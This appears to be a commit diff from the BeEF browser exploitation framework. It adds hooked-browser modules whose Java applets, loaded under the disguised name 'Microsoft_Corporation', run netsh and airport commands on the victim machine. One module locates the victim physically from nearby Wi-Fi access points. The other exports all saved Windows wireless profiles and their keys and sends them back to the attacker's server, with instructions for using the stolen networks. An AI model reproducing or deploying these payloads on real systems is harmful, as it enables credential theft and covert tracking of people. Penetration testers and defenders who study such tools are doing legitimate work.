// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/getGPSLocation.jar';
var applet_id = '<%= @applet_id %>';
var applet_name = '<%= @applet_name %>';
var output;
beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'getGPSLocation' ,
null, applet_archive, null);
output = document.Microsoft_Corporation.getInfo();
if (output) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'location_info='+output);
}
beef.dom.detachApplet('getGPSLocation');
});

26
modules/host/get_physical_location/config.yaml Executable file
View File

@@ -0,0 +1,26 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
get_physical_location:
enable: true
category: "Host"
name: "Get Physical Location"
description: "This module will retrieve geolocation information based on the neighboring wireless access points using commands encapsulated within a signed Java Applet. <br/><br/>The details will include:<br/> <ul><li> - GPS Coordinates details</li><li> - Street Address details</li></ul><br/><br/> If the victim machine has a firewall that monitors outgoing connections (Zonealaram, LittleSnitch, ..), calls to Google maps will be alerted."
authors: ["keith_lee @keith55 http://milo2012.wordpress.com", "antisnatchor"]
target:
working: ["IE"]
user_notify: ["C", "S", "O", "FF"]

BIN
modules/host/get_physical_location/getGPSLocation.class Executable file
View File

Binary file not shown.

BIN
modules/host/get_physical_location/getGPSLocation.jar Executable file
View File

Binary file not shown.

178
modules/host/get_physical_location/getGPSLocation.java Executable file
View File

@@ -0,0 +1,178 @@
import java.io.*;
import java.util.*;
import java.net.*;
import java.applet.*;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
// Keith Lee
// Twitter: @keith55
// http://milo2012.wordpress.com
// keith.lee2012[at]gmail.com
public class getGPSLocation extends Applet{
public static String result = "";
public getGPSLocation(){
super();
return;
}
public static String getInfo() {
return result;
}
public void init() {
if (isWindows()) {
result=getWindows();
} else if (isMac()) {
result=getMac();
} else {
//System.out.println("Your OS is not support!!");
}
}
public static String getWindows(){
try {
ArrayList ssidList = new ArrayList();
ArrayList bssidList = new ArrayList();
ArrayList rssiList = new ArrayList();
Process p = Runtime.getRuntime().exec("netsh wlan show networks mode=bssid");
BufferedReader in = new BufferedReader(
new InputStreamReader(p.getInputStream()));
String line = null;
String signal = null;
String ssidStr = null;
while ((line = in.readLine()) != null) {
Pattern p1 = Pattern.compile("(SSID\\s\\d+\\s:)\\s([\\w\\s]*)");
Matcher m1 = p1.matcher(line);
if(m1.find()){
ssidStr = m1.group(2);
ssidStr = ssidStr.replaceAll(" ","%20");
ssidList.add(ssidStr);
}
Pattern p2 = Pattern.compile("(BSSID\\s1\\s*:)\\s((.?)*)");
Matcher m2 = p2.matcher(line);
if(m2.find()){
bssidList.add(m2.group(2));
}
Pattern p3 = Pattern.compile("(Signal\\s*):\\s((.?)*)");
Matcher m3 = p3.matcher(line);
if(m3.find()){
signal = m3.group(2);
signal = signal.replaceAll("%","");
signal = signal.replaceAll(" ","");
signal = "-"+signal;
rssiList.add(signal);
}
}
int arraySize=ssidList.size();
if(arraySize==0){
result="\nI don't know where the target is";
}
else{
result=googleLookup(bssidList,ssidList,rssiList);
}
} catch (Exception e) {
System.out.println(e.getMessage());
}
return result;
}
public static String googleLookup(ArrayList bssidList,ArrayList ssidList,ArrayList rssiList){
String queryString = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true";
try {
int j=0;
while(j<ssidList.size()){
queryString+="&wifi=mac:";
queryString+=bssidList.get(j);
queryString+="%7C";
queryString+="ssid:";
queryString+=ssidList.get(j);
queryString+="%7C";
queryString+="ss:";
queryString+=rssiList.get(j);
j++;
}
} catch (Exception e) {
System.out.println(e.getMessage());
}
return queryString;
}
public static String getMac(){
try {
Process p = Runtime.getRuntime().exec("/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport scan");
BufferedReader in = new BufferedReader(new InputStreamReader(p.getInputStream()));
String line = null;
String ssidStr = null;
String signal = null;
String queryString = "https://maps.googleapis.com/maps/api/browserlocation/json?browser=firefox&sensor=true";
ArrayList ssidList = new ArrayList();
ArrayList bssidList = new ArrayList();
ArrayList rssiList = new ArrayList();
line = in.readLine();
while ((line = in.readLine()) != null) {
line = line.replaceAll("^\\s+", "");
Pattern p1 = Pattern.compile("((.?)*\\s\\w*):(\\w*:\\w*:\\w*:\\w*:\\w*)\\s((.?)*)\\s(\\d+)");
Matcher m1 = p1.matcher(line);
if(m1.find()){
ssidStr = m1.group(1);
ssidStr = ssidStr.replaceAll(" ","%20");
ssidList.add(ssidStr);
bssidList.add(m1.group(2));
signal = m1.group(3);
signal = signal.replaceAll(" ","");
rssiList.add(signal);
}
}
int arraySize=ssidList.size();
if(arraySize==0){
result="\nI don't know where the target is";
}
else{
result=googleLookup(bssidList,ssidList,rssiList);
}
} catch (Exception e) {
System.out.println(e.getMessage());
}
return result;
}
public static boolean isWindows() {
String os = System.getProperty("os.name").toLowerCase();
// windows
return (os.indexOf("win") >= 0);
}
public static boolean isMac() {
String os = System.getProperty("os.name").toLowerCase();
// Mac
return (os.indexOf("mac") >= 0);
}
public static boolean isLinux() {
String os = System.getProperty("os.name").toLowerCase();
// linux or unix
return (os.indexOf("nix") >= 0 || os.indexOf("nux") >= 0);
}
}

49
modules/host/get_physical_location/module.rb Executable file
View File

@@ -0,0 +1,49 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'rubygems'
require 'json'
require 'open-uri'
class Get_physical_location < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_physical_location/getGPSLocation.jar', '/getGPSLocation', 'jar')
end
def post_execute
results = @datastore['results'].to_s
results = results.gsub("location_info=","")
response = open(results).read
result = JSON.parse(response)
reverseGoogleUrl = "https://maps.googleapis.com/maps/geo?q="+result['location']['lat'].to_s+','+result['location']['lng'].to_s+"&output=json&sensor=true_or_false"
googleResults = open(reverseGoogleUrl).read
jsonGoogleResults = JSON.parse(googleResults)
addressFound = jsonGoogleResults['Placemark'][0]['address']
writeToResults = Hash.new
writeToResults['data'] = addressFound
BeEF::Core::Models::Command.save_result(@datastore['beefhook'], @datastore['cid'] , @friendlyname, writeToResults)
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/getGPSLocation.jar')
content = {}
content['Result'] = addressFound
save content
end
end

3
modules/host/get_system_info/config.yaml
View File

@@ -22,5 +22,8 @@ beef:
description: "This module will retrieve basic information about the host system using an unsigned Java Applet. <br/><br/>The details will include:<br/> <ul><li> - Operating system details</li><li> - Java VM details</li><li> - NIC names and IP</li><li> - Number of processors</li><li> - Amount of memory</li><li> - Screen display modes</li></ul>"
authors: ["bcoles", "antisnatchor"]
target:
not_working:
ALL:
os: ["iPhone", "Macintosh"]
working: ["O", "FF", "S", "IE"]
user_notify: ["C"]

30
modules/host/get_wireless_keys/command.js Normal file
View File

@@ -0,0 +1,30 @@
//
// Copyright 2011 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/wirelessZeroConfig.jar';
var applet_id = '<%= @applet_id %>';
var applet_name = '<%= @applet_name %>';
var output;
beef.dom.attachApplet(applet_id, 'Microsoft_Corporation', 'wirelessZeroConfig' ,
null, applet_archive, null);
output = document.Microsoft_Corporation.getInfo();
if (output) {
beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+output);
}
beef.dom.detachApplet('wirelessZeroConfig');
});

25
modules/host/get_wireless_keys/config.yaml Normal file
View File

@@ -0,0 +1,25 @@
#
# Copyright 2011 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
get_wireless_keys:
enable: true
category: "Host"
name: "Get Wireless Keys"
description: "This module will retrieve the wireless profiles from the target computer.<br/><br/>You will need to copy the results to 'exported_wlan_profiles.xml' and then reimport back into your Windows Vista/7 computers by running the command:<br/>netsh wlan add profile filename=\"exported_wlan_profiles.xml\".<br/><br/>After that, just launch and connect to the wireless network without any password prompt.<br/><br/>For more information, refer to http://pauldotcom.com/2012/03/retrieving-wireless-keys-from.html"
authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
target:
user_notify: ["IE", "C", "S", "O", "FF"]

35
modules/host/get_wireless_keys/module.rb Normal file
View File

@@ -0,0 +1,35 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
class Get_wireless_keys < BeEF::Core::Command
def pre_send
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/host/get_wireless_keys/wirelessZeroConfig.jar','/wirelessZeroConfig','jar')
end
def post_execute
content = {}
content['result'] = @datastore['result'].to_s
save content
f = File.open("exported_wlan_profiles.xml","w+")
f.write((@datastore['results']).sub("result=",""))
writeToResults = Hash.new
writeToResults['data'] = "Please import "+Dir.pwd+"/exported_wlan_profiles.xml into your windows machine"
BeEF::Core::Models::Command.save_result(@datastore['beefhook'], @datastore['cid'] , @friendlyname, writeToResults)
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/wirelessZeroConfig.jar')
end
end

BIN
modules/host/get_wireless_keys/wirelessZeroConfig.class Normal file
View File

Binary file not shown.

BIN
modules/host/get_wireless_keys/wirelessZeroConfig.jar Normal file
View File

Binary file not shown.

117
modules/host/get_wireless_keys/wirelessZeroConfig.java Normal file
View File

@@ -0,0 +1,117 @@
import java.io.*;
import java.util.*;
import java.net.*;
import java.applet.*;
// Keith Lee
// Twitter: @keith55
// http://milo2012.wordpress.com
// keith.lee2012[at]gmail.com
public class wirelessZeroConfig extends Applet{
public static String result = "";
public wirelessZeroConfig(){
super();
return;
}
public static String getInfo() {
return result;
}
public void init() {
if (isWindows()) {
String osVersion= System.getProperty("os.version");
if(osVersion.equals("6.0") || osVersion.equals("6.1")){
result=getWindows();
}
} else {
result = "OS is not supported";
}
}
public static String getWindows(){
String cmd1 = "netsh wlan show profiles";
String cmd2 = "netsh wlan export profile name=";
String keyword1 = "User profiles";
String wlanProfileArr[];
String wlanProfileName;
int match = 0;
int count = 0;
ArrayList<String> profileList = new ArrayList<String>();
try {
//Get wlan profile names
Process p1 = Runtime.getRuntime().exec(cmd1);
BufferedReader in1 = new BufferedReader(new InputStreamReader(p1.getInputStream()));
String line = null;
//Checks if string match "User profiles"
while ((line = in1.readLine()) != null) {
//Checks if string match "User profiles"
if(match==0){
if(line.toLowerCase().contains(keyword1.toLowerCase())){
match=1;
}
}
if(match==1){
if(count>1){
//If string matches the keyword "User Profiles"
line = (line.replaceAll("\\s+$","").replaceAll("^\\s+", ""));
if(line.length()>0){
wlanProfileName = (line.split(":")[1]).replaceAll("\\s+$","").replaceAll("^\\s+", "");;
profileList.add(wlanProfileName);
}
}
count+=1;
}
}
in1.close();
} catch (IOException e) { }
try{
String tmpDir = System.getProperty("java.io.tmpdir");
if ( !(tmpDir.endsWith("/") || tmpDir.endsWith("\\")) )
tmpDir = tmpDir + System.getProperty("file.separator");
//Export WLAN Profile to XML file
for(Iterator iterator = profileList.iterator(); iterator.hasNext();){
String profileName = iterator.next().toString();
Process p2 = Runtime.getRuntime().exec(cmd2+'"'+profileName+'"');
//Check if exported xml exists
File f = new File(tmpDir+"Wireless Network Connection-"+profileName+".xml");
if(f.exists()){
//Read contents of XML file into results variable
FileInputStream fstream = new FileInputStream(f);
DataInputStream in2 = new DataInputStream(fstream);
BufferedReader br = new BufferedReader(new InputStreamReader(in2));
String xmlToStr;
while((xmlToStr = br.readLine()) != null){
result+=xmlToStr;
}
in2.close();
}
}
} catch (IOException e) {
}
return result;
}
public static boolean isWindows() {
String os = System.getProperty("os.name").toLowerCase();
return (os.indexOf("win") >= 0);
}
/**
public static void main(String[] args) {
if (isWindows()) {
String osVersion= System.getProperty("os.version");
System.out.println(osVersion);
if(osVersion.equals("6.0") || osVersion.equals("6.1")){
result=getWindows();
}
} else {
result = "OS is not supported";
}
System.out.println(result);
}
**/
}

3
modules/host/hook_default_browser/config.yaml
View File

@@ -22,5 +22,8 @@ beef:
description: "This module will use a PDF to attempt to hook the default browser (assuming it isn't currently hooked). <br><br>Normally, this will be IE but it will also work when Chrome is set to the default. When executed, the hooked browser will load a PDF and use that to start the default browser. If successful another browser will appear in the browser tree."
authors: ["saafan"]
target:
not_working:
ALL:
os: ["iPhone"]
working: ["All"]
user_notify: ["FF", "C"]

2
modules/host/insecure_url_skype/config.yaml
View File

@@ -16,7 +16,7 @@
beef:
module:
insecure_url_skype:
enable: true
enable: false
category: "Host"
name: "Make Skype Call (Skype)"
description: "This module will force the browser to attempt a skype call. It will exploit the insecure handling of URL schemes<br><br>The protocol handler used will be: skype."

Some files were not shown because too many files have changed in this diff Show More